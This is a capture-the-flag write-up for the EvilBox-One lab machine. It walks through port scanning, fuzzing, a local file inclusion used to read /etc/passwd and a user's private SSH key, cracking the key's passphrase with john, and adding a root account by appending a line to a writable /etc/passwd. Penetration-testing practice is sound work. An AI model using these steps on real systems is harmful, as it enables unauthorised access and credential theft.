Proving grounds Play - EvilBox-One CTF writeup.

Nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 || Web

Fuzzing

Files

Directory

Fuzz for files in /secrets directory.

Found file evil.php

http://192.168.152.212/secret/evil.php

Fuzz for paramaters

http://192.168.152.212/secret/evil.php?FUZZ=/etc/passwd

Trying local file inclusion vulnerability to check the words retieved in the response to confirm the parameter.

http://192.168.152.212/secret/evil.php?command=/etc/passwd

As shown in the above /etc/passwd file we have a user mowree.

mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash

Using the LFI vulnerability we can obtain the SSH key for the user mowree.

http://192.168.152.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa

SSH to mowree using the SSH key.

Using id_rsa key to login to the mowree user account is prompted with password to continue. So use ssh2john to create hash for the SSH key and crack the same using john.

Extracted password unicorn

Initial Foothold Obtained

Privilege Escalation

Check the permissions for /etc/passwd.

/etc/passwd is writable so we can create our own root user.

Writing new user to /etc/passwd

echo "hacker:bWBoOyE1sFaiQ:0:0:root:/root:/bin/bash" >> /etc/passwd

Switch to user hacker and enter password mypass to obtain root.

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.